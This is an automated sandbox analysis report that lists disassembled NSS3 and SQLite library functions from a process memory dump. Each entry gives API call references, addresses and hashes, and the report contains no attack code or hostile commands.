                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                            • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                            • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                            • Opcode ID: 6feb4e2db345c1888c08e0fddaa9ccb47d76c8ffd67c89e35ee6adf603b2c774
                                                                                                                                                                                                                            • Instruction ID: 7a40c49e2756771450486df052acfa2451befa63c4fa87323777469e690d7991
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6feb4e2db345c1888c08e0fddaa9ccb47d76c8ffd67c89e35ee6adf603b2c774
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF71B0B0A042859BEB019F24DC45B7E3675EF4531DF180135E809BAB42EF32E959CBA7
                                                                                                                                                                                                                            Function 6CBA6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                            • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                            • Opcode ID: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
                                                                                                                                                                                                                            • Instruction ID: 5f27187e7b69d8b9796fff1e320c54becead9eace638f169fe32ab8261d71a53
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1501A2F170638277E6502BFD6C8EF66356CEF41259F140431FE04E4981FA96E51641AA
                                                                                                                                                                                                                            Function 6CB5ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 786543732-0
                                                                                                                                                                                                                            • Opcode ID: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
                                                                                                                                                                                                                            • Instruction ID: b88c5b0632a68b8e3ae01edac5d4ebef12bdea57ebdcf3a321ddf6e2644a2e94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66518BB1A012668BDB00EF99DC416BE77B4FB06349F640125D805B7B50E331EA65CFE6
                                                                                                                                                                                                                            Function 6CB9ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CB9ADE6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AE17
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE29
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AE3F
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB9AE78
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE8A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AEA0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                                                                                                                                                            • API String ID: 332880674-605059067
                                                                                                                                                                                                                            • Opcode ID: 5c862c5aac7abf2ff49db6851be1eec0e4341c9f5f15d9ff4bbcd82455e46229
                                                                                                                                                                                                                            • Instruction ID: 99f8abf8b3b773173d611679a5182a34b42d33635c5ac1965eca2b72709c11d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c862c5aac7abf2ff49db6851be1eec0e4341c9f5f15d9ff4bbcd82455e46229
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531E571A01284ABCB109F14DC98FAF3BB5EB4731DF454435E409ABA51EB309949CFA2
                                                                                                                                                                                                                            Function 6CC34C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6CC34CAF
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34CFD
                                                                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6CC34D44
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                            • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                            • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                            • Opcode ID: f5c23d6fd6928fbe84a885a1e3b29bfb9be3762a98bbe266df3b3aa5e4954821
                                                                                                                                                                                                                            • Instruction ID: bb3d64af9d0684bbc7439271a0660423a79ed2db4bf4240aef18da7155cad124
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5c23d6fd6928fbe84a885a1e3b29bfb9be3762a98bbe266df3b3aa5e4954821
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4314572E04971ABD705CB25F8017A57F32B7C2358F192169D82C4BE54F723A85287E2
                                                                                                                                                                                                                            Function 6CB92DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_InitPIN), ref: 6CB92DF6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB92E24
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB92E33
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB92E49
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92E68
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92E81
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                                                                                                                                                            • API String ID: 1003633598-1777813432
                                                                                                                                                                                                                            • Opcode ID: f6c4bf03adc3af8b8fe45a6d075f861e1d31b9709eb037cd1f246f3563070ac3
                                                                                                                                                                                                                            • Instruction ID: f622eb9a7084df6ae2c4e09a52afcd9174b077e32a1d1f56ae70496830fb53ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c4bf03adc3af8b8fe45a6d075f861e1d31b9709eb037cd1f246f3563070ac3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831DFB5A01194ABDB109B15DC9CB9B3BB5EB4331DF094035E809A7B51EB309E49CBA2
                                                                                                                                                                                                                            Function 6CC32D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CC32D9F
                                                                                                                                                                                                                              • Part of subcall function 6CAECA30: EnterCriticalSection.KERNEL32(?,?,?,6CB4F9C9,?,6CB4F4DA,6CB4F9C9,?,?,6CB1369A), ref: 6CAECA7A
                                                                                                                                                                                                                              • Part of subcall function 6CAECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CAECB26
                                                                                                                                                                                                                            • sqlite3_exec.NSS3(?,?,6CC32F70,?,?), ref: 6CC32DF9
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC32E2C
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E3A
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E52
                                                                                                                                                                                                                            • sqlite3_mprintf.NSS3(6CC9AAF9,?), ref: 6CC32E62
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E70
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E89
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32EBB
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32ECB
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC32F3E
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32F4C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1957633107-0
                                                                                                                                                                                                                            • Opcode ID: b91c15aefe11137b0546ebf29b15ca1540b9f7919bb3cf9e84e0922c330d7e20
                                                                                                                                                                                                                            • Instruction ID: 63bb9226fdfc655f085622f4487d25b42172695bc454d940a7ab7d4e9f0b615f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b91c15aefe11137b0546ebf29b15ca1540b9f7919bb3cf9e84e0922c330d7e20
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64618DB5E002258BEF01CF69E895BDEB7B1AF48348F145024DD59A7742E731E849CBE1
                                                                                                                                                                                                                            Function 6CB82C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6CB83F23,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C62
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C76
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C86
                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C93
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CC6
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CDA
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23), ref: 6CB82CEA
                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82CF7
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82D4D
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB82D61
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6CB82D71
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB82D7E
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2446853827-0
                                                                                                                                                                                                                            • Opcode ID: 125c626005922d1cd2f46254b95d45946696f80fc11f48b758138bed46f3ce47
                                                                                                                                                                                                                            • Instruction ID: f96c7fdaac14f467c7055cc44095a98379ab99fe37fdd1a3e432aa65982305a3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125c626005922d1cd2f46254b95d45946696f80fc11f48b758138bed46f3ce47
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5751E5B6D01255AFEB009F24DC458AA7B78FF1525CF048520EC1997B12F731E964CBE2
                                                                                                                                                                                                                            Function 6CB77C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2120,Function_00097E60,00000000,?,?,?,?,6CBF067D,6CBF1C60,00000000), ref: 6CB77C81
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB77CA0
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB77CB4
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB77CCF
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB77D04
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB77D1B
                                                                                                                                                                                                                            • realloc.MOZGLUE(-00000050), ref: 6CB77D82
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB77DF4
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB77E0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2305085145-0
                                                                                                                                                                                                                            • Opcode ID: 5043de26c3fee0d2c018da7f96f20c0cf6361fa1592746ee63643c57c47dd746
                                                                                                                                                                                                                            • Instruction ID: ea79a3b592b6408de5bbfbf03cf423f3b1c06dbba388a1f4ef537cf66eab2744
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5043de26c3fee0d2c018da7f96f20c0cf6361fa1592746ee63643c57c47dd746
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D5136B1A042509FDF229F28CC44A6577B5FB06318F264139DD25E7722FBB1DA50CBA2
                                                                                                                                                                                                                            Function 6CAE4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
